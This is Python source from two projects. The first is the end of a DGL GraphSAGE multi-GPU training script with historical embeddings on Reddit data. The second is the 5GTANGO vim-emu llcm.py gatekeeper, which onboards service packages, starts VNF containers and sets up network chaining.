device : The GPU device to evaluate on.
"""
model.eval()
with th.no_grad():
inputs = g.ndata['features']
pred = model.inference(g, inputs, batch_size, device) # also recomputes history tensors
model.train()
return compute_acc(pred[val_mask], labels[val_mask])
def load_subtensor(g, labels, blocks, hist_blocks, dev_id, aggregation_on_device=False):
"""
Copies features and labels of a set of nodes onto the GPU.
"""
blocks[0].srcdata['features'] = g.ndata['features'][blocks[0].srcdata[dgl.NID]]
blocks[-1].dstdata['label'] = labels[blocks[-1].dstdata[dgl.NID]]
ret_blocks = []
ret_hist_blocks = []
for i, (block, hist_block) in enumerate(zip(blocks, hist_blocks)):
hist_col = 'features' if i == 0 else 'hist_%d' % i
block.srcdata['hist'] = g.ndata[hist_col][block.srcdata[dgl.NID]]
# Aggregate history
hist_block.srcdata['hist'] = g.ndata[hist_col][hist_block.srcdata[dgl.NID]]
if aggregation_on_device:
hist_block = hist_block.to(dev_id)
hist_block.srcdata['hist'] = hist_block.srcdata['hist']
hist_block.update_all(fn.copy_u('hist', 'm'), fn.mean('m', 'agg_hist'))
block = block.to(dev_id)
if not aggregation_on_device:
hist_block = hist_block.to(dev_id)
block.dstdata['agg_hist'] = hist_block.dstdata['agg_hist']
ret_blocks.append(block)
ret_hist_blocks.append(hist_block)
return ret_blocks, ret_hist_blocks
def create_history_storage(g, args, n_classes):
# Initialize history storage
for l in range(args.num_layers):
dim = args.num_hidden if l != args.num_layers - 1 else n_classes
g.ndata['hist_%d' % (l + 1)] = th.zeros(g.number_of_nodes(), dim).share_memory_()
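# Example (illustrative): with args.num_layers == 2 and args.num_hidden == 16,
# this allocates g.ndata['hist_1'] of shape (num_nodes, 16) and
# g.ndata['hist_2'] of shape (num_nodes, n_classes), both in shared memory.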
def init_history(g, model, dev_id, batch_size):
with th.no_grad():
model.inference(g, g.ndata['features'], batch_size, dev_id) # replaces hist_i features in-place
def update_history(g, blocks):
with th.no_grad():
for i, block in enumerate(blocks):
ids = block.dstdata[dgl.NID].cpu()
hist_col = 'hist_%d' % (i + 1)
h_new = block.dstdata['h_new'].cpu()
g.ndata[hist_col][ids] = h_new
@thread_wrapped_func
def run(proc_id, n_gpus, args, devices, data):
dropout = 0.2
dev_id = devices[proc_id]
if n_gpus > 1:
dist_init_method = 'tcp://{master_ip}:{master_port}'.format(
master_ip='127.0.0.1', master_port='12345')
world_size = n_gpus
th.distributed.init_process_group(backend="nccl",
init_method=dist_init_method,
world_size=world_size,
rank=proc_id)
th.cuda.set_device(dev_id)
# Unpack data
train_mask, val_mask, in_feats, labels, n_classes, g = data
train_nid = train_mask.nonzero().squeeze()
val_nid = val_mask.nonzero().squeeze()
# Split train_nid
train_nid = th.split(train_nid, math.ceil(len(train_nid) / n_gpus))[proc_id]
# Create sampler
sampler = NeighborSampler(g, [int(_) for _ in args.fan_out.split(',')])
# Create PyTorch DataLoader for constructing blocks
dataloader = DataLoader(
dataset=train_nid.numpy(),
batch_size=args.batch_size,
collate_fn=sampler.sample_blocks,
shuffle=True,
drop_last=False,
num_workers=args.num_workers_per_gpu)
# Define model
model = SAGE(in_feats, args.num_hidden, n_classes, args.num_layers, F.relu)
# Move the model to GPU and define optimizer
model = model.to(dev_id)
if n_gpus > 1:
model = DistributedDataParallel(model, device_ids=[dev_id], output_device=dev_id)
loss_fcn = nn.CrossEntropyLoss()
loss_fcn = loss_fcn.to(dev_id)
optimizer = optim.Adam(model.parameters(), lr=args.lr)
# Compute history tensor and their aggregation before training on CPU
model.eval()
if n_gpus > 1:
if proc_id == 0:
init_history(g, model.module, dev_id, args.val_batch_size)
th.distributed.barrier()
else:
init_history(g, model, dev_id, args.val_batch_size)
model.train()
# Training loop
avg = 0
iter_tput = []
for epoch in range(args.num_epochs):
tic = time.time()
model.train()
for step, (blocks, hist_blocks) in enumerate(dataloader):
if proc_id == 0:
tic_step = time.time()
# The nodes for input lie on the LHS side of the first block.
# The nodes for output lie on the RHS side of the last block.
seeds = blocks[-1].dstdata[dgl.NID]
blocks, hist_blocks = load_subtensor(g, labels, blocks, hist_blocks, dev_id, True)
# forward
batch_pred = model(blocks)
# update history
update_history(g, blocks)
# compute loss
batch_labels = blocks[-1].dstdata['label']
loss = loss_fcn(batch_pred, batch_labels)
# backward
optimizer.zero_grad()
loss.backward()
optimizer.step()
if proc_id == 0:
iter_tput.append(len(seeds) * n_gpus / (time.time() - tic_step))
if step % args.log_every == 0 and proc_id == 0:
acc = compute_acc(batch_pred, batch_labels)
print('Epoch {:05d} | Step {:05d} | Loss {:.4f} | Train Acc {:.4f} | Speed (samples/sec) {:.4f}'.format(
epoch, step, loss.item(), acc.item(), np.mean(iter_tput[3:])))
if n_gpus > 1:
th.distributed.barrier()
toc = time.time()
if proc_id == 0:
print('Epoch Time(s): {:.4f}'.format(toc - tic))
if epoch >= 5:
avg += toc - tic
if epoch % args.eval_every == 0 and epoch != 0:
model.eval()
eval_acc = evaluate(
model if n_gpus == 1 else model.module, g, labels, val_nid, args.val_batch_size, dev_id)
print('Eval Acc {:.4f}'.format(eval_acc))
if n_gpus > 1:
th.distributed.barrier()
if proc_id == 0:
print('Avg epoch time: {}'.format(avg / (epoch - 4)))
if __name__ == '__main__':
argparser = argparse.ArgumentParser("multi-gpu training")
argparser.add_argument('--gpu', type=str, default='0')
argparser.add_argument('--num-epochs', type=int, default=20)
argparser.add_argument('--num-hidden', type=int, default=16)
argparser.add_argument('--num-layers', type=int, default=2)
argparser.add_argument('--fan-out', type=str, default='1,1')
argparser.add_argument('--batch-size', type=int, default=1000)
argparser.add_argument('--val-batch-size', type=int, default=1000)
argparser.add_argument('--log-every', type=int, default=20)
argparser.add_argument('--eval-every', type=int, default=5)
argparser.add_argument('--lr', type=float, default=0.003)
argparser.add_argument('--num-workers-per-gpu', type=int, default=0)
args = argparser.parse_args()
devices = list(map(int, args.gpu.split(',')))
n_gpus = len(devices)
# load reddit data
data = RedditDataset(self_loop=True)
n_classes = data.num_classes
g = data[0]
features = g.ndata['feat']
in_feats = features.shape[1]
labels = g.ndata['label']
train_mask = g.ndata['train_mask']
val_mask = g.ndata['val_mask']
g.ndata['features'] = features.share_memory_()
create_history_storage(g, args, n_classes)
g.create_format_()
# Pack data
data = train_mask, val_mask, in_feats, labels, n_classes, g
if n_gpus == 1:
run(0, n_gpus, args, devices, data)
else:
procs = []
for proc_id in range(n_gpus):
p = mp.Process(target=run, args=(proc_id, n_gpus, args, devices, data))
p.start()
procs.append(p)
for p in procs:
p.join()
|
llcm.py
|
# Copyright (c) 2018 SONATA-NFV, 5GTANGO and Paderborn University
# ALL RIGHTS RESERVED.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Neither the name of the SONATA-NFV, 5GTANGO, Paderborn University
# nor the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written
# permission.
#
# This work has been performed in the framework of the SONATA project,
# funded by the European Commission under Grant number 671517 through
# the Horizon 2020 and 5G-PPP programmes. The authors would like to
# acknowledge the contributions of their colleagues of the SONATA
# partner consortium (www.sonata-nfv.eu).
#
# This work has also been performed in the framework of the 5GTANGO project,
# funded by the European Commission under Grant number 761493 through
# the Horizon 2020 and 5G-PPP programmes. The authors would like to
# acknowledge the contributions of their colleagues of the 5GTANGO
# partner consortium (www.5gtango.eu).
import logging
import os
import uuid
import hashlib
import zipfile
import yaml
import threading
import datetime
from docker import DockerClient
from flask import Flask, request
import flask_restful as fr
from gevent.pywsgi import WSGIServer
from subprocess import Popen
import ipaddress
import copy
import time
LOG = logging.getLogger("5gtango.llcm")
LOG.setLevel(logging.INFO)
CORS_HEADER = {'Access-Control-Allow-Origin': '*',
'Access-Control-Allow-Methods': 'GET,OPTIONS'}
GK_STORAGE = "/tmp/vim-emu-tango-llcm/"
UPLOAD_FOLDER = os.path.join(GK_STORAGE, "uploads/")
CATALOG_FOLDER = os.path.join(GK_STORAGE, "catalog/")
# Enable Dockerfile build functionality
BUILD_DOCKERFILE = False
# flag to indicate that we run without the emulator (only the bare API for
# integration testing)
GK_STANDALONE_MODE = False
# should a new version of an image be pulled even if it is already available
FORCE_PULL = False
# flag to indicate if we use bidirectional forwarding rules in the
# automatic chaining process
BIDIRECTIONAL_CHAIN = True
# override the management interfaces in the descriptors with default
# docker0 interfaces in the containers
USE_DOCKER_MGMT = False
# automatically deploy uploaded packages (no need to execute son-access
# deploy --latest separately)
AUTO_DEPLOY = False
# and also automatically terminate any other running services
AUTO_DELETE = False
# global subnet definitions (see reset_subnets())
ELAN_SUBNETS = None
ELINE_SUBNETS = None
# Time in seconds to wait for vnf stop scripts to execute fully
VNF_STOP_WAIT_TIME = 5
# If services are instantiated multiple times, the public port
# mappings need to be adapted to avoid collisions. We use this
# offset for this: NEW_PORT = (SSIID * OFFSET) + ORIGINAL_PORT
MULTI_INSTANCE_PORT_OFFSET = 1000
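# Example (illustrative): with the default offset of 1000, the second instance
# (SSIID=1) of a service that publishes port 8080 is re-published on
# 1 * 1000 + 8080 = 9080.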
# Selected Placement Algorithm: Points to the class of the selected
# placement algorithm.
PLACEMENT_ALGORITHM_OBJ = None
# Path to folder with <container_name>.env.yml files that contain
# environment variables injected into the specific container
# when it is started.
PER_INSTANCE_ENV_CONFIGURATION_FOLDER = None
class OnBoardingException(BaseException):
pass
class Gatekeeper(object):
def __init__(self):
self.services = dict()
self.dcs = dict()
self.net = None
# used to generate short names for VNFs (Mininet limitation)
self.vnf_counter = 0
reset_subnets()
LOG.info("Initialized 5GTANGO LLCM module.")
def register_service_package(self, service_uuid, service):
"""
register new service package
:param service_uuid
:param service object
"""
self.services[service_uuid] = service
# lets perform all steps needed to onboard the service
service.onboard()
class Service(object):
"""
This class represents an NS uploaded as a *.son package to the
dummy gatekeeper.
Can have multiple running instances of this service.
"""
def __init__(self,
service_uuid,
package_file_hash,
package_file_path):
self.uuid = service_uuid
self.package_file_hash = package_file_hash
self.package_file_path = package_file_path
self.package_content_path = os.path.join(
CATALOG_FOLDER, "services/%s" % self.uuid)
self.manifest = None
self.nsd = None
self.vnfds = dict()
self.local_docker_files = dict()
self.remote_docker_image_urls = dict()
self.instances = dict()
self._instance_counter = 0
self.created_at = str(datetime.datetime.now())
def onboard(self):
"""
Do all steps to prepare this service to be instantiated
:return:
"""
# 1. extract the contents of the package and store them in our catalog
self._unpack_service_package()
# 2. read in all descriptor files
self._load_package_descriptor()
self._load_nsd()
self._load_vnfd()
if self.nsd is None:
raise OnBoardingException("No NSD found.")
if len(self.vnfds) < 1:
raise OnBoardingException("No VNFDs found.")
# 3. prepare container images (e.g. download or build Dockerfile)
if BUILD_DOCKERFILE:
self._load_docker_files()
self._build_images_from_dockerfiles()
else:
self._load_docker_urls()
self._pull_predefined_dockerimages()
# 4. reserve subnets
eline_fwd_links, elan_fwd_links = self._get_elines_and_elans()
self.eline_subnets = [ELINE_SUBNETS.pop(0) for _ in eline_fwd_links]
self.elan_subnets = [ELAN_SUBNETS.pop(0) for _ in elan_fwd_links]
LOG.debug("Reserved subnets for service '{}': E-Line: {} / E-LAN: {}"
.format(self.manifest.get("name"),
self.eline_subnets, self.elan_subnets))
LOG.info("On-boarded service: {}".format(self.manifest.get("name")))
def start_service(self):
"""
This methods creates and starts a new service instance.
It computes placements, iterates over all VNFDs, and starts
each VNFD as a Docker container in the data center selected
by the placement algorithm.
:return:
"""
LOG.info("Starting service {} ({})"
.format(get_triple_id(self.nsd), self.uuid))
# 1. each service instance gets a new uuid to identify it
instance_uuid = str(uuid.uuid4())
# build an instances dict (a bit like an NSR :))
self.instances[instance_uuid] = dict()
self.instances[instance_uuid]["uuid"] = self.uuid
# SSIID = short service instance ID (to postfix Container names)
self.instances[instance_uuid]["ssiid"] = self._instance_counter
self.instances[instance_uuid]["name"] = get_triple_id(self.nsd)
self.instances[instance_uuid]["vnf_instances"] = list()
self.instances[instance_uuid]["created_at"] = str(datetime.datetime.now())
# increase for next instance
self._instance_counter += 1
# 3. start all vnfds that we have in the service
for vnf_id in self.vnfds:
vnfd = self.vnfds[vnf_id]
# attention: returns a list of started deployment units
vnfis = self._start_vnfd(
vnfd, vnf_id, self.instances[instance_uuid]["ssiid"])
# add list of VNFIs to total VNFI list
self.instances[instance_uuid]["vnf_instances"].extend(vnfis)
# 4. Deploy E-Line, E-Tree and E-LAN links
# Attention: Only done if "forwarding_graphs" section in NSD exists,
# even if "forwarding_graphs" are not used directly.
# Attention2: Do a copy of *_subnets with list() is important here!
eline_fwd_links, elan_fwd_links = self._get_elines_and_elans()
# 5a. deploy E-Line links
GK.net.deployed_elines.extend(eline_fwd_links) # bookkeeping
self._connect_elines(eline_fwd_links, instance_uuid, list(self.eline_subnets))
# 5b. deploy E-Tree/E-LAN links
GK.net.deployed_elans.extend(elan_fwd_links) # bookkeeping
self._connect_elans(elan_fwd_links, instance_uuid, list(self.elan_subnets))
# 6. run the emulator specific entrypoint scripts in the VNFIs of this
# service instance
self._trigger_emulator_start_scripts_in_vnfis(
self.instances[instance_uuid]["vnf_instances"])
# done
LOG.info("Service '{}' started. Instance id: {} SSIID: {}"
.format(self.instances[instance_uuid]["name"],
instance_uuid,
self.instances[instance_uuid]["ssiid"]))
return instance_uuid
def stop_service(self, instance_uuid):
"""
This method stops a running service instance.
It iterates over all VNF instances, stopping them each
and removing them from their data center.
:param instance_uuid: the uuid of the service instance to be stopped
"""
LOG.info("Stopping service %r" % self.uuid)
# get relevant information
# instance_uuid = str(self.uuid.uuid4())
vnf_instances = self.instances[instance_uuid]["vnf_instances"]
# trigger stop scripts in vnf instances and wait a few seconds for
# completion
self._trigger_emulator_stop_scripts_in_vnfis(vnf_instances)
time.sleep(VNF_STOP_WAIT_TIME)
# stop all vnfs
for v in vnf_instances:
self._stop_vnfi(v)
# last step: remove the instance from the list of all instances
del self.instances[instance_uuid]
def _get_elines_and_elans(self):
"""
Get the E-Line, E-LAN, E-Tree links from the NSD.
"""
# Attention: Only done if "forwarding_graphs" section in NSD exists,
# even if "forwarding_graphs" are not used directly.
eline_fwd_links = list()
elan_fwd_links = list()
if "virtual_links" in self.nsd and "forwarding_graphs" in self.nsd:
vlinks = self.nsd["virtual_links"]
# constituent virtual links are not checked
eline_fwd_links = [l for l in vlinks if (
l["connectivity_type"] == "E-Line")]
elan_fwd_links = [l for l in vlinks if (
l["connectivity_type"] == "E-LAN" or
l["connectivity_type"] == "E-Tree")] # Treat E-Tree as E-LAN
return eline_fwd_links, elan_fwd_links
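# Illustrative example (assumption) of an NSD "virtual_links" entry that this
# method classifies; the "vnf_id:cp_id" reference format is assumed here:
#   - id: link-vnf1-vnf2
#     connectivity_type: E-Line
#     connection_points_reference: ["vnf1:cp-in", "vnf2:cp-out"]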
def _get_resource_limits(self, deployment_unit):
"""
Extract resource limits from deployment units.
"""
# defaults
cpu_list = None
cpu_period, cpu_quota = self._calculate_cpu_cfs_values(float(1.0))
mem_limit = None
# update from descriptor
if "resource_requirements" in deployment_unit:
res_req = deployment_unit.get("resource_requirements")
cpu_list = res_req.get("cpu").get("cpuset")
if cpu_list is None:
cpu_list = res_req.get("cpu").get("vcpus")
if cpu_list is not None:
# attention: docker expects list as string w/o spaces:
cpu_list = str(cpu_list).replace(" ", "").strip()
cpu_bw = res_req.get("cpu").get("cpu_bw")
if cpu_bw is None:
cpu_bw = 1.0
cpu_period, cpu_quota = self._calculate_cpu_cfs_values(float(cpu_bw))
mem_limit = res_req.get("memory").get("size")
mem_unit = str(res_req.get("memory").get("size_unit", "GB"))
if mem_limit is not None:
mem_limit = int(mem_limit)
# to bytes
if "G" in mem_unit:
mem_limit = mem_limit * 1024 * 1024 * 1024
elif "M" in mem_unit:
mem_limit = mem_limit * 1024 * 1024
elif "K" in mem_unit:
mem_limit = mem_limit * 1024
return cpu_list, cpu_period, cpu_quota, mem_limit
def _start_vnfd(self, vnfd, vnf_id, ssiid, **kwargs):
"""
Start a single VNFD of this service
:param vnfd: vnfd descriptor dict
:param vnf_id: unique id of this vnf in the nsd
:return:
"""
vnfis = list()
# the vnf_name refers to the container image to be deployed
vnf_name = vnfd.get("name")
# combine VDUs and CDUs
deployment_units = (vnfd.get("virtual_deployment_units", []) +
vnfd.get("cloudnative_deployment_units", []))
# iterate over all deployment units within each VNFDs
for u in deployment_units:
# 0. vnf_container_name = vnf_id.vdu_id
vnf_container_name = get_container_name(vnf_id, u.get("id"))
vnf_container_instance_name = get_container_name(vnf_id, u.get("id"), ssiid)
# 1. get the name of the docker image to start
if vnf_container_name not in self.remote_docker_image_urls:
raise Exception("No image name for %r found. Abort." % vnf_container_name)
docker_image_name = self.remote_docker_image_urls.get(vnf_container_name)
# 2. select datacenter to start the VNF in
target_dc = self._place(vnfd, vnf_id, u, ssiid)
# 3. perform some checks to ensure we can start the container
assert(docker_image_name is not None)
assert(target_dc is not None)
if not self._check_docker_image_exists(docker_image_name):
raise Exception("Docker image {} not found. Abort."
.format(docker_image_name))
# 4. get the resource limits
cpu_list, cpu_period, cpu_quota, mem_limit = self._get_resource_limits(u)
# get connection points defined for the DU
intfs = u.get("connection_points", [])
# do some re-naming of fields to be compatible to containernet
for i in intfs:
if i.get("address"):
LOG.info("Found static address for {}: {}"
.format(i.get("id"), i.get("address")))
i["ip"] = i.get("address")
# get ports and port_bindings from the port and publish fields of CNFD
# see: https://github.com/containernet/containernet/wiki/Exposing-and-mapping-network-ports
ports = list() # Containernet naming
port_bindings = dict()
for i in intfs:
if i.get("port"): # field with a single port
if not isinstance(i.get("port"), int):
LOG.info("Field 'port' is no int CP: {}".format(i))
else:
ports.append(i.get("port")) # collect all ports
if i.get("ports"): # list with multiple ports
if not isinstance(i.get("ports"), list):
LOG.info("Field 'port' is no list CP: {}".format(i))
else:
for p in i.get("ports"):
if not isinstance(p, int):
# do some parsing
try:
if "/udp" in p:
p = tuple(p.split("/"))
else:
p = int(p)
ports.append(p) # collect all ports
except BaseException as ex:
LOG.error(
"Could not parse ports list: {}".format(p))
LOG.error(ex)
else:
ports.append(p) # collect all ports
if i.get("publish"):
if not isinstance(i.get("publish"), dict):
LOG.info("Field 'publish' is no dict CP: {}".format(i))
else:
port_bindings.update(i.get("publish"))
# update port mapping for cases where service is deployed > 1 times
port_bindings = update_port_mapping_multi_instance(ssiid, port_bindings)
if len(ports) > 0:
LOG.info("{} exposes ports: {}".format(vnf_container_instance_name, ports))
if len(port_bindings) > 0:
LOG.info("{} publishes ports: {}".format(vnf_container_instance_name, port_bindings))
# 5. collect additional information to start container
volumes = list()
cenv = dict()
# 5.1 inject descriptor based start/stop commands into env (overwrite)
VNFD_CMD_START = u.get("vm_cmd_start")
VNFD_CMD_STOP = u.get("vm_cmd_stop")
if VNFD_CMD_START and not VNFD_CMD_START == "None":
LOG.info("Found 'vm_cmd_start'='{}' in VNFD.".format(VNFD_CMD_START) +
" Overwriting SON_EMU_CMD.")
cenv["SON_EMU_CMD"] = VNFD_CMD_START
if VNFD_CMD_STOP and not VNFD_CMD_STOP == "None":
LOG.info("Found 'vm_cmd_start'='{}' in VNFD.".format(VNFD_CMD_STOP) +
" Overwriting SON_EMU_CMD_STOP.")
cenv["SON_EMU_CMD_STOP"] = VNFD_CMD_STOP
# 5.2 inject per instance configurations based on envs
conf_envs = self._load_instance_conf_envs(vnf_container_instance_name)
cenv.update(conf_envs)
# 5.3 handle optional ipc_mode setting
ipc_mode = u.get("ipc_mode", None)
# 5.4 handle optional devices setting
devices = u.get("devices", [])
# 5.5 handle optional cap_add setting
cap_add = u.get("cap_add", [])
# 6. Start the container
LOG.info("Starting %r as %r in DC %r" %
(vnf_name, vnf_container_instance_name, target_dc))
LOG.debug("Interfaces for %r: %r" % (vnf_id, intfs))
# start the container
vnfi = target_dc.startCompute(
vnf_container_instance_name,
network=intfs,
image=docker_image_name,
cpu_quota=cpu_quota,
cpu_period=cpu_period,
cpuset_cpus=cpu_list,
mem_limit=mem_limit,
volumes=volumes,
properties=cenv, # environment
ports=ports,
port_bindings=port_bindings,
# only publish if explicitly stated in descriptor
publish_all_ports=False,
ipc_mode=ipc_mode,
devices=devices,
cap_add=cap_add,
type=kwargs.get('type', 'docker'))
# add vnfd reference to vnfi
vnfi.vnfd = vnfd
# add container name
vnfi.vnf_container_name = vnf_container_name
vnfi.vnf_container_instance_name = vnf_container_instance_name
vnfi.ssiid = ssiid
# store vnfi
vnfis.append(vnfi)
return vnfis
def _stop_vnfi(self, vnfi):
"""
Stop a VNF instance.
:param vnfi: vnf instance to be stopped
"""
# Find the correct datacenter
status = vnfi.getStatus()
dc = vnfi.datacenter
# stop the vnfi
LOG.info("Stopping the vnf instance contained in %r in DC %r" %
(status["name"], dc))
dc.stopCompute(status["name"])
def _get_vnf_instance(self, instance_uuid, vnf_id):
"""
Returns VNFI object for a given "vnf_id" or "vnf_container_name" taken from an NSD.
:return: single object
"""
for vnfi in self.instances[instance_uuid]["vnf_instances"]:
if str(vnfi.name) == str(vnf_id):
return vnfi
LOG.warning("No container with name: {0} found.".format(vnf_id))
return None
def _get_vnf_instance_units(self, instance_uuid, vnf_id):
"""
Returns a list of VNFI objects (all deployment units) for a given
"vnf_id" taken from an NSD.
:return: list
"""
if vnf_id is None:
return None
r = list()
for vnfi in self.instances[instance_uuid]["vnf_instances"]:
if vnf_id in vnfi.name:
r.append(vnfi)
if len(r) > 0:
LOG.debug("Found units: {} for vnf_id: {}"
.format([i.name for i in r], vnf_id))
return r
LOG.warning("No container(s) with name: {0} found.".format(vnf_id))
return None
@staticmethod
def _vnf_reconfigure_network(vnfi, if_name, net_str=None, new_name=None):
"""
Reconfigure the network configuration of a specific interface
of a running container.
:param vnfi: container instance
:param if_name: interface name
:param net_str: network configuration string, e.g., 1.2.3.4/24
:param new_name: optional new name for the interface
:return:
"""
# assign new ip address
if net_str is not None:
intf = vnfi.intf(intf=if_name)
if intf is not None:
intf.setIP(net_str)
LOG.debug("Reconfigured network of %s:%s to %r" %
(vnfi.name, if_name, net_str))
else:
LOG.warning("Interface not found: %s:%s. Network reconfiguration skipped." % (
vnfi.name, if_name))
if new_name is not None:
vnfi.cmd('ip link set', if_name, 'down')
vnfi.cmd('ip link set', if_name, 'name', new_name)
vnfi.cmd('ip link set', new_name, 'up')
LOG.debug("Reconfigured interface name of %s:%s to %s" %
(vnfi.name, if_name, new_name))
def _trigger_emulator_start_scripts_in_vnfis(self, vnfi_list):
for vnfi in vnfi_list:
config = vnfi.dcinfo.get("Config", dict())
env = config.get("Env", list())
for env_var in env:
var, cmd = map(str.strip, map(str, env_var.split('=', 1)))
if var == "SON_EMU_CMD" or var == "VIM_EMU_CMD":
LOG.info("Executing script in '{}': {}={}"
.format(vnfi.name, var, cmd))
# execute command in new thread to ensure that GK is not
# blocked by VNF
t = threading.Thread(target=vnfi.cmdPrint, args=(cmd,))
t.daemon = True
t.start()
break # only execute one command
def _trigger_emulator_stop_scripts_in_vnfis(self, vnfi_list):
for vnfi in vnfi_list:
config = vnfi.dcinfo.get("Config", dict())
env = config.get("Env", list())
for env_var in env:
var, cmd = map(str.strip, map(str, env_var.split('=', 1)))
if var == "SON_EMU_CMD_STOP" or var == "VIM_EMU_CMD_STOP":
LOG.info("Executing script in '{}': {}={}"
.format(vnfi.name, var, cmd))
# execute command in new thread to ensure that GK is not
# blocked by VNF
t = threading.Thread(target=vnfi.cmdPrint, args=(cmd,))
t.daemon = True
t.start()
break # only execute one command
def _load_instance_conf_envs(self, cname):
"""
Try to load an instance-specific env file. If not found,
just return an empty dict.
"""
if PER_INSTANCE_ENV_CONFIGURATION_FOLDER is None:
return dict()
try:
path = os.path.expanduser(PER_INSTANCE_ENV_CONFIGURATION_FOLDER)
path = os.path.join(path, "{}.env.yml".format(cname))
res = load_yaml(path)
LOG.info("Loaded instance-specific env file for '{}': {}"
.format(cname, res))
return res
except BaseException as ex:
LOG.info("No instance-specific env file found for: {}"
.format(cname))
del ex
return dict()
def _unpack_service_package(self):
"""
unzip *.son file and store contents in CATALOG_FOLDER/services/<service_uuid>/
"""
LOG.info("Unzipping: %r" % self.package_file_path)
with zipfile.ZipFile(self.package_file_path, "r") as z:
z.extractall(self.package_content_path)
def _load_package_descriptor(self):
"""
Load the main package descriptor YAML and keep it as dict.
:return:
"""
self.manifest = load_yaml(
os.path.join(
self.package_content_path, "TOSCA-Metadata/NAPD.yaml"))
def _load_nsd(self):
"""
Load the entry NSD YAML and keep it as dict.
:return:
"""
if "package_content" in self.manifest:
nsd_path = None
for f in self.manifest.get("package_content"):
if f.get("content-type") == "application/vnd.5gtango.nsd":
nsd_path = os.path.join(
self.package_content_path,
make_relative_path(f.get("source")))
break # always use the first NSD for now
if nsd_path is None:
raise OnBoardingException("No NSD with type 'application/vnd.5gtango.nsd' found.")
self.nsd = load_yaml(nsd_path)
GK.net.deployed_nsds.append(self.nsd) # TODO this seems strange (remove?)
LOG.debug("Loaded NSD: %r" % self.nsd.get("name"))
else:
raise OnBoardingException(
"No 'package_content' section in package manifest:\n{}"
.format(self.manifest))
def _load_vnfd(self):
"""
Load all VNFD YAML files referenced in MANIFEST.MF and keep them in dict.
:return:
"""
# first make a list of all the vnfds in the package
vnfd_set = dict()
if "package_content" in self.manifest:
for pc in self.manifest.get("package_content"):
if pc.get(
"content-type") == "application/vnd.5gtango.vnfd":
vnfd_path = os.path.join(
self.package_content_path,
make_relative_path(pc.get("source")))
vnfd = load_yaml(vnfd_path)
vnfd_set[vnfd.get("name")] = vnfd
if len(vnfd_set) < 1:
raise OnBoardingException("No VNFDs found.")
# then link each vnf_id in the nsd to its vnfd
for v in self.nsd.get("network_functions"):
if v.get("vnf_name") in vnfd_set:
self.vnfds[v.get("vnf_id")] = vnfd_set[v.get("vnf_name")]
LOG.debug("Loaded VNFD: {0} id: {1}"
.format(v.get("vnf_name"), v.get("vnf_id")))
def _connect_elines(self, eline_fwd_links, instance_uuid, subnets):
"""
Connect all E-LINE links in the NSD
Attention: This method DOES NOT support multi V/CDU VNFs!
:param eline_fwd_links: list of E-LINE links in the NSD
:param: instance_uuid of the service
:param: subnets list of subnets to be used
:return:
"""
# cookie is used as identifier for the flowrules installed by the dummygatekeeper
# eg. different services get a unique cookie for their flowrules
cookie = 1
for link in eline_fwd_links:
LOG.info("Found E-Line: {}".format(link))
src_id, src_if_name = parse_interface(
link["connection_points_reference"][0])
dst_id, dst_if_name = parse_interface(
link["connection_points_reference"][1])
LOG.info("Searching C/VDU for E-Line: src={}, src_if={}, dst={}, dst_if={}"
.format(src_id, src_if_name, dst_id, dst_if_name))
# handle C/VDUs (ugly hack, only one V/CDU per VNF for now)
src_units = self._get_vnf_instance_units(instance_uuid, src_id)
dst_units = self._get_vnf_instance_units(instance_uuid, dst_id)
if src_units is None or dst_units is None:
LOG.info("No VNF-VNF link. Skipping: src={}, src_if={}, dst={}, dst_if={}"
.format(src_id, src_if_name, dst_id, dst_if_name))
return
# we only support VNFs with one V/CDU right now
if len(src_units) != 1 or len(dst_units) != 1:
raise BaseException("LLCM does not support E-LINES for multi V/CDU VNFs.")
# get the full name from that C/VDU and use it as src_id and dst_id
src_id = src_units[0].name
dst_id = dst_units[0].name
# from here we have all info we need
LOG.info("Creating E-Line for C/VDU: src={}, src_if={}, dst={}, dst_if={}"
.format(src_id, src_if_name, dst_id, dst_if_name))
# get involved vnfis
src_vnfi = src_units[0]
dst_vnfi = dst_units[0]
# proceed with chaining setup
setChaining = False
if src_vnfi is not None and dst_vnfi is not None:
setChaining = True
# re-configure the VNFs IP assignment and ensure that a new
# subnet is used for each E-Link
eline_net = subnets.pop(0)
ip1 = "{0}/{1}".format(str(eline_net[1]),
eline_net.prefixlen)
ip2 = "{0}/{1}".format(str(eline_net[2]),
eline_net.prefixlen)
# check if VNFs have fixed IPs (ip/address field in VNFDs)
if (self._get_vnfd_cp_from_vnfi(
src_vnfi, src_if_name).get("ip") is None and
self._get_vnfd_cp_from_vnfi(
src_vnfi, src_if_name).get("address") is None):
self._vnf_reconfigure_network(src_vnfi, src_if_name, ip1)
# check if VNFs have fixed IPs (ip field in VNFDs)
if (self._get_vnfd_cp_from_vnfi(
dst_vnfi, dst_if_name).get("ip") is None and
self._get_vnfd_cp_from_vnfi(
dst_vnfi, dst_if_name).get("address") is None):
self._vnf_reconfigure_network(dst_vnfi, dst_if_name, ip2)
# set the chaining
if setChaining:
GK.net.setChain(
src_id, dst_id,
vnf_src_interface=src_if_name, vnf_dst_interface=dst_if_name,
bidirectional=BIDIRECTIONAL_CHAIN, cmd="add-flow", cookie=cookie, priority=10)
def _get_vnfd_cp_from_vnfi(self, vnfi, ifname):
"""
Gets the connection point data structure from the VNFD
of the given VNFI using ifname.
"""
if vnfi.vnfd is None:
return {}
cps = vnfi.vnfd.get("connection_points")
for cp in cps:
if cp.get("id") == ifname:
return cp
def _connect_elans(self, elan_fwd_links, instance_uuid, subnets):
"""
Connect all E-LAN/E-Tree links in the NSD
This method supports multi-V/CDU VNFs if the connection
point names of the DUs are the same as the ones in the NSD.
:param elan_fwd_links: list of E-LAN links in the NSD
:param: instance_uuid of the service
:param: subnets list of subnets to be used
:return:
"""
for link in elan_fwd_links:
# a new E-LAN/E-Tree
elan_vnf_list = []
lan_net = subnets.pop(0)
lan_hosts = list(lan_net.hosts())
# generate lan ip address for all interfaces (of all involved (V/CDUs))
for intf_ref in link["connection_points_reference"]:
vnf_id, intf_name = parse_interface(intf_ref)
if vnf_id is None:
continue # skip references to NS connection points
units = self._get_vnf_instance_units(instance_uuid, vnf_id)
if units is None:
